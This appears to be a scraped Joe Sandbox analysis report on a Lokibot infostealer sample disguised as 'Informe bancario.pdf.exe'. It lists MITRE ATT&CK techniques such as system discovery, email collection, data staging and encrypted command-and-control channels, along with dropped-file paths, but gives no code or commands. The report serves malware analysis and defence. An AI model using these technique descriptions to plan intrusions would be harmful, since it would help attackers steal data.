Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Informe bancario.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Informe bancario.pdf.exe.log

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
Informe bancario.pdf.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre